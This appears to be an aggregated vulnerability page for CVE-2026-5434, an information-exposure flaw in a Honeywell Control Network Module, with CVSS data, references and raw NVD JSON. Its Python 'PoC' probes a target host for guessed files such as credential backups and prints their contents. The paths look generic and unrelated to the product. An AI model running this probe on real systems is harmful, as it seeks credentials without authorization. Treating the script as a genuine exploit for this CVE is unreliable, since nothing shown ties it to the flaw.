CVE-2026-5434

Description

Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Honeywell Control Network Module (CNM) (具体版本未披露)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-5434: Sensitive Information Insertion
# Description: Checks for sensitive files in unintended directories.

import requests

def check_poc(target_ip):
    target_url = f"http://{target_ip}"
    # Common paths where sensitive info might be unintentionally stored
    paths_to_check = [
        "/unintended_dir/config.ini",
        "/logs/sensitive_data.log",
        "/tmp/secret_file.txt",
        "/backup/credentials.bak"
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-5434-PoC/1.0)"
    }

    print(f"[*] Targeting: {target_url}")
    
    for path in paths_to_check:
        try:
            response = requests.get(target_url + path, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential sensitive data found at: {path}")
                print(f"[+] Content snippet: {response.text[:200]}")
            else:
                print(f"[-] {path} - Status: {response.status_code}")
        except Exception as e:
            print(f"Error connecting to {target_url}: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    check_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5434
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5434
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5434/
[4] VulDB https://vuldb.com/cve/CVE-2026-5434
[5] https://process.honeywell.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5434", "sourceIdentifier": "[email protected]", "published": "2026-05-21T09:16:30.410", "lastModified": "2026-05-21T15:26:35.653", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Honeywell Control\nNetwork Module (CNM) contains\ninsertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing\nsystem files, potentially resulting in unintended\naccess to protected data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://process.honeywell.com/", "source": "[email protected]"}]}}